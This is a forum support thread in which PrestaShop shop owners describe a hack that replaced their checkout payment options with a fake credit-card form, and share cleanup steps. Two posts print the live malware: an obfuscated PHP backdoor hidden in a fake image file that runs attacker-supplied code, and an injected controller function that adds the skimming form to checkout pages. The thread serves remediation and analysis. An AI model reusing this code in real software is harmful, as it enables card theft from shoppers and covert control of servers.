Payment was replaced by Hacker

[qiqiy_888]

My site is V1.6.1.  My payment was replaced by unknow credit card module. they collect our customers credit card info.

Please check that,  anyone can help ??

[qiqiy_888]

All my other payment methods were display:none; Important !

Customers can't find my payment method, only see this fake collect credit card info.

Please help !!!

[c64girl]

UnInstall the module or delete IT front FTP. Password the catalog od prestashop using cpanel or diretadmin. Use migration tool to copy orderem,products,users,static pages and use newer prestashop.

Edited May 5, 2023 by c64girl
a (see edit history)

[GIO.D.P.M.]

Hello.

I have the same problem.

  I can't see my payment methods.

What can I do to fix it?

[razaro]

There is a solution, (use google translate if needed)

this script removes main hack files but it also gives you list of edited files that may also have some encrypted code (mostly at end of files).

You need to open those files and remove code or if uncertain replace with original files.

 

Also explained here bit more

https://www.mediacom87.fr/en/how-to-prevent-hacking-on-prestashop-and-thirty-bees/

[qiqiy_888]

10 hours ago, razaro said:

There is a solution, (use google translate if needed)

this script removes main hack files but it also gives you list of edited files that may also have some encrypted code (mostly at end of files).

You need to open those files and remove code or if uncertain replace with original files.

 

Also explained here bit more

https://www.mediacom87.fr/en/how-to-prevent-hacking-on-prestashop-and-thirty-bees/

Thank you so much, i will check this.

[qiqiy_888]

12 hours ago, GIO.D.P.M. said:

Hello.

I have the same problem.

  I can't see my payment methods.

What can I do to fix it?

@razaro post is helpful. but i just change the tpl file at theme files : order-payment.tpl

i changed the id="HOOK_PAYMENT"  to id="HOOK_PAYMENT_*******"    the payment show now

i am not sure it can fix the problem, but now, our customers can see the payment method. 

[qiqiy_888]

19 hours ago, c64girl said:

UnInstall the module or delete IT front FTP. Password the catalog od prestashop using cpanel or diretadmin. Use migration tool to copy orderem,products,users,static pages and use newer prestashop.

Thank you for your suggestion

[razaro]

@qiqiy_888

Note that changing code in that file have no effect on hackers in general. They used code placed somewhere deep in you root folder and on multiple places that when called copies complete payment.tpl  and injects fake form. 

You should also check your hosting, if you are on Plesk there is ImunifyAV or 360 or maybe Clam Anti-Virus, with them you can scan files from hosting. Cleaner.php linked script, do find most of issues but some could slip.

[Rynraf]

GOOD news!

The same thing happened to me. This is what it looked like in every cart step:

But it's much easier way in this case to remove all infected files. There were about (I didn't count) 50 infected files just to remove and about 4 files to replace them by original Prestashop files.

What I did, step by step, easy steps:

1. Download ALL files from ftp using FTP client (for example: FileZilla) to my local disk, to my computer.
2. I did this on Windows 10. It's enough to use default Windows Defender. But I'm sure that every antyvirus will also alert all infected files just after downloading them.
3. Windows Defener listed me all infected files.
4. Using ftp client I opened each path, each folders on ftp server like was listed by Defender as infected files. All files which have to be deleted have "pairs" - always some file with graphic extension like jpg, png, webp + tiny php file with the same name, just with different extension (.php). Easy to find in folders because its names looks like JVcdl7fS.php and JVcdl7fS.png - created from random letters and digits.
5. Few php files should be replaced, just few files. I got them from clear Preastashop installation with the same PS version.

This are folders listed by my native to Windows antyvirus. I guess that it's possible that in every store will be different folders with infected files. Don't know.

After all - my checkout is clear!

 

Thank yout for this topic. It was inspiration for me how to resolve this. P.S. I couldn't use cleaner.php because memory limit and some other limtations on a server.

Edited February 19 by Rynraf
small typo (see edit history)

[Rynraf]

For the more insightful, what was inside this infected pairs of php and "image" files...

For example: /js/jquery/plugins/growl/cgjNl.php just always opening this "image" file:

<?php $cgjNl='cgjNl.jpeg';if(file_exists($cgjNl)){include $cgjNl;}

and the "image" file (for example: /js/jquery/plugins/growl/cgjNl.jpeg:) contains:

<?php $m17="IhgcXbMnWJ4GVOeU0piNoTuKd27ZAL3sf8y1tw5ElBCRQ_aFSkzvPH6jD9qYxrm";$n8520=$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7].$m17[45].$m17[14].$m17[60].$m17[18].$m17[31].$m17[36].$m17[31];$faa33=$m17[3].$m17[61].$m17[14].$m17[46].$m17[36].$m17[14].$m17[45].$m17[32].$m17[22].$m17[7].$m17[3].$m17[36].$m17[18].$m17[20].$m17[7];$a1d2b=$m17[5].$m17[46].$m17[31].$m17[14].$m17[54].$m17[10].$m17[45].$m17[24].$m17[14].$m17[3].$m17[20].$m17[24].$m17[14];if(@$n8520($faa33)){$p357 = @$faa33('', @$a1d2b('aWYoCQlpc3NldCggCiRfUE9TVFtwcm9kdWN0X2lkXSkgICAmJiBtZDUoJF9QT1NUW3Byb2R1Y3RfaWRdCQopIAo9PT0iMzQyNTFhODIxMzllYTI5YzNhZjFlNjA1OTA3ZDE2ZWEiIAkpIHsJZXZhbCgKYmFzZTY0X2RlY29kZSgkX1BPU1RbaW1hZ2VfaWRdKQkpOyAJZXhpdCgpOwoJfTs='));@$p357();}

Finish. Clear cart! Good luck!

No more this scam info:

Pay with debit or credit card
We don't share your financial details with the merchant.
No matter where you shop, we keep your financial information secure.

[d3t0n4t0r]

Hi there,

I don't think that is the exact cause of the injected credit card form on checkout page. 

If you decode the obfuscated code that you've shared, you'll understand that these code is a backdoor code to maintain persistent access.

Though that is a good find, and would help Prestashop owner to stop the re-infection on the website.

 

The real injection that causing the fake credit card form added into checkout page hide inside these files:

./classes/controller/FrontController.php
./classes/controller/Controller.php

 

You'll need to remove these code inside files mentioned above in order to eliminate the injection:

public function jschecks($html,$p)
    {
        $urp=[
            "order",
            "Bestellung",
            "bestellung",
            "commande",
            "objednavka",
            "pedido",
            "carrito",
            "koszykgt",
            "zamowienie",
            "comanda",
            "checkout",
            "ordine",
            "befejezett-rendeles",
            "wienie",
            "הזמנה",
            "%D7%94%D7%96%D7%9E%D7%A0%D7%94",
            "sipariş vermiş olmalısınız",
            "sipari%C5%9F%20vermi%C5%9F%20olmal%C4%B1s%C4%B1n%C4%B1z",
            "παραγγελία",
            "%CF%80%CE%B1%CF%81%CE%B1%CE%B3%CE%B3%CE%B5%CE%BB%CE%AF%CE%B1",
            "siparis",
            "encomenda",
            "objednávku",
            "objedn%C3%A1vku",
            "objednávka",
            "objedn%C3%A1vka",
            "objednavku",
            "greitas-uzsakymas",
            "rendeles-befejezese",
            "zamowieni",
            "u%C5%BEsakymas",
            "porud%C5%BEbinu",
            "bestelling",
            "porachka",
            "ordre",
            "hurtigordre",
            "uzsakymas",
        ];

        include_once($_SERVER['DOCUMENT_ROOT'].'/config/config.inc.php');
		include_once($_SERVER['DOCUMENT_ROOT'].'/config/settings.inc.php');
		include_once($_SERVER['DOCUMENT_ROOT'].'/classes/Cookie.php');
		$context = Context::getContext();
		$cart = new Cart($context->cookie->id_cart);


		if($cart->id!=""){

			$cookie = new Cookie('psAdmin');
			if (!$cookie->id_employee){


		        foreach($urp as $u){
		            if (strpos($_SERVER["REQUEST_URI"], $u) !== false && strpos($_SERVER["REQUEST_URI"], "admin") == false && strpos($_SERVER["REQUEST_URI"], "Admin") == false ){
		                $html=$html.@base64_decode(@file_get_contents($_SERVER["DOCUMENT_ROOT"].$p));
		                return $html;
		            }
		        }
	        }
        }
        return $html;
    }

 

$html=$this->jschecks($html,"/img/XXXX.png");

and also remove the image file mention on the code above, at img directory.

Once those code were removed, the fake credit card form should disappear.

If you replace/overwrite the Prestashop core files, that should remediate the issue as well, since the file Controller.php and FrontController.php will be replaced with the stock/default core files.

Hope this information help in some ways. Thanks

[Rynraf]

That's right. But I also wrote above about this files in classes directory. I replaced this files by original files from fresh, clear PS installation (of the same PS version). Works.

[Rynraf]

If problem will return...

Please check your main folder. On my ftp with PS was also file with name "bbc.php" (231 KB). Remove it.

As I checked in server logs - every day there was connection (when this "bad" files were uploaded to my ftp) from the same IP number. I also blocked on my server all connections from this IP (from Netherland).